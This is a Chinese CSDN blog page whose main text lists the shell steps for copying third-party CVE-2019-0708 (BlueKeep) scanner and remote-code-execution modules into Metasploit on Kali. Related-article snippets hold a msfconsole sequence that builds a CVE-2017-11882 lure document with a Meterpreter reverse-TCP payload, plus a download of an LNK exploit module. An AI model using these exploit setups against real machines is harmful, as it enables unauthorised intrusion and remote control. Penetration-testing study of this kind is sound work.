Metasploit-framework import CVE module

最新推荐文章于 2022-09-01 14:20:17 发布
最新推荐文章于 2022-09-01 14:20:17 发布
阅读量317 收藏
点赞数
分类专栏: 渗透 文章标签: 安全 kali metasploit
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_30036471/article/details/102826117
版权

Metasploit-framework import CVE module

1. Update MSF

root@kali:~# apt update
root@kali:~# apt install metasploit-framework

2. Copy module script to Metasploit-framework

root@kali:~# cp rdp.rb /usr/share/metasploit-framework/lib/msf/core/exploit/rdp.rb

root@kali:~# cp rdp_scanner.rb /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/rdp_scanner.rb

root@kali:~# cp cve_2019_0708_bluekeep.rb /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb

root@kali:~# mkdir /usr/share/metasploit-framework/modules/exploits/windows/rdp/

root@kali:~# cp cve_2019_bluekeep_rce.rb /usr/share/metasploit-framework/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb

root@kali:~# msfconsole
msf5 > reload_all

Jensen_79
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Metasploit-模块介绍
weixin_44257023的博客
08-23 1688
Metasploit-模块介绍
metasploit利用CVE-2017-11882
公众号shadow sock7
08-19 1187
./msfconsole use exploit/windows/fileformat/cve_2017_11882 set URIPATH test set payload windows/meterpreter/reverse_tcp set lhost 172.18.126.113 set FILENAME helloword.doc
metasploit编写自己的module
Yale的博客
01-31 3455
制作我们自己的模块module 这次实验我们将会使用ruby编写我们自己的第一个模块。 没学过ruby?ruby语法很简单,不要紧的。我们这次只是做一个启蒙的作用,不会涉及高深的语法知识。主要的目的在于了解metasploit的体系结构,module的框架,以及编写一个能够输出hello world的module并成功能够在metasploit中成功使用 在我们深入研究模块构建和开发之前,先来看一...
Metasploit Frameworkmodule 模板结构
shawdow_bug的博客
11-26 3399
Metasploit Framework简称msf,是一个渗透测试平台,集成大量可用于渗透测试的模块,并且提供了模块的统一编写规范,可自行按照规范编写模块,并允许在自己的模块包含平台中的其他模块,最后把模块集成到 msf 中即可使用。因此,msf 既是一款工具,也是一个平台。 msf 的模块主要用 Ruby 语言编写,为什么是主要呢?因为在新版本中也给出了 python 的模板。 以实现 exploit 模块为例子,官方给出的针对 web 服务的模板文件在 metasploit-framework/mo
python调用msf_从python poc到metasploit模块
weixin_39521651的博客
11-30 748
metasploit5从metasploit开始引入了第三方模块,也就是说可以使用python来编写模块。并且可以加入主分支。得到最新版本由于kail等渗透系统并不是使用github上的最新版本,版本还在4.x。所以我们需要在github上下载git clone https://github.com/rapid7/metasploit-framework/将原来的msf配置文件复制到下载下来的文件...
metasploit-framework-master.zip
09-08
"metasploit-framework-master.zip" 是这个框架的源代码压缩包,包含了完整的开发环境和工具集合。 **Metasploit框架的核心组件** 1. **Payloads(有效载荷)**:有效载荷是攻击的核心部分,它们在目标系统上执行...
metasploit-framework-6.3.34.zip
09-17
Metasploit Framework 6.3.34:渗透测试的利器》 Metasploit Framework,简称MSF,是一款开源的安全漏洞检测工具,主要用于安全研究人员进行渗透测试和漏洞验证。这个版本是6.3.34,代表着软件的最新迭代,通常会...
metasploitframework-win-x64
10-05
Metasploit Framework 作为一个缓冲区溢出测试使用的辅助工具,也可以说是一个漏洞利用和测试平台。它集成了各平台上常见的溢出漏洞和流行的shellcode,并且不断更新,使得缓冲区溢出测试变得方便和简单。 使用...
metasploit-framework-6.3.34.tar.gz
最新发布
09-17
这个6.3.34版本的压缩包“metasploit-framework-6.3.34.tar.gz”包含了该框架的完整源代码和相关资源,为安全研究人员提供了丰富的功能和灵活性。 一、Metasploit Framework 简介 Metasploit 是一个强大的安全验证...
毒蛇:metasploit-framework图形界面图形化内网渗透工具
02-01
【毒蛇:Metasploit-Framework图形界面图形化内网渗透工具】 毒蛇,全称为Viper,是一款基于Python开发的Metasploit-Framework的图形界面工具,它为红队和安全研究人员提供了一个友好的界面,用于管理和执行渗透...
Metasploit 添加第三方模块进行漏洞验证
GodLordGee的博客
02-26 4371
问题描述 msf自带的模块已经很丰富了,但是,这并不能完全满足我们的需求,对于一些比较新的漏洞或者没有官方模块支持的漏洞,我们就只能自己写或者寻找网上大佬贴出的模块导入使用。但是怎么导入第三方模块让我浪费了一点时间,写在这里,方便自己以后查找。 参考链接          https://zhuanlan.zhihu.com/p/32509309 解决方法 1、创建相应...
将python扩展到msf中
gao646467783的博客
06-01 555
msf框架提供了python的接口,并且网上有好多以Python写的渗透测试代码,尤其是exploit-da等漏洞库中,可不可以把网上的python代码稍稍改动一下放到msf中使用呢(假如根据同一套的逻辑重写一个的话,不仅要对ruby有一些理解,而且要费事的重写)?
Metasploit渗透测试框架的基本使用
weixin_68281676的博客
09-01 1620
msf渗透攻击的使用
如何在metasploit中加入第三方脚本(CVE-2019-0708可批量检测)
大哥一声吼
05-24 1万+
msf具有很高的开放性,可以加入第三方脚本毋庸置疑 本文目的:解决自己添加的rb脚本在msf中不能用的问题 【文末附有poc脚本下载地址】rdp rce 首先把下载的脚本放入msf对应的目录之下,之后msfconle下reload_all 放入脚本之后满心欢喜的等待使用,结果返回下面一大堆错我信息,看了上网上的教程并没有找到解决方法 msf > reload_all ...
msf下的LNK漏洞复现
极光时流
08-02 348
1.漏洞环境及攻击系统 漏洞环境 靶机: win7 x64 :192.168.1.102 攻击机:kali x64 :192.168.1.104 漏洞利用 1.kali 主机下载 cve_2017_8464_lnk_rce.rb: wget https://raw.githubusercontent.com/ykoster/metasploit-framework/169e00bf3442447...
Metasploit更新
weixin_34268310的博客
06-08 410
Metasploit更新,官方放弃SVN,开始使用GIT 有一段时间没有写文章了,今天翻译一篇文章吧。以后Metasploit更新,请不要再使用下面的方法了 1 svn co https://www.metasploit.com/svn/framework3/trunk 请使用GIT来进行更新 ...
linux cp无法创建一般文件夹,cp: 无法创建普通文件 : 文件已存在
weixin_36342428的博客
04-30 8234
背景碰到一个偶现的编译出错问题,如图 报错的信息是cp: 无法创建普通文件"xxx": 文件已存在排查原因看了下 Makefile,这句非常简单,就是 cp ./xxx ../xxx 而已,本身没什么问题。那再结合上下文出现的打印,一个异常之处就是 Makfeile 被并行重复执行了,猜测是并行导致 cp 操作出错。只考虑解决问题,那无疑是修改外层 Makefile ,避免此处被并行重复执行,至少...
Metasploit利用ms17_010渗透测试winserv 2008 SP 2
E4
04-27 6888
这次我们利用的是ms17-10对2008服务器进行一次渗透测试。 话不多说QAQ 测试环境: 攻击机:Kali (2018,2) IP:192.168.10.78 靶机:windows server 2008 (SP1) IP:192.168.10.77 因为我的kali是2018年的,已经附带了ms17_010,有些小伙伴的kali还是2016的版本,我这里也贴出来了下载...
metasploit更新
热门推荐
经典的误导的专栏
10-31 1万+
使用msfupdate的时候会更新出错,搜索各种资料
metasploitframework-latest
07-13
4. 切换到克隆下来的 metasploit-framework 目录: ``` cd metasploit-framework ``` 5. 安装依赖项。在终端中运行以下命令: ``` bundle install ``` 6. 安装完成后,你可以通过以下命令启动 Metasploit ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值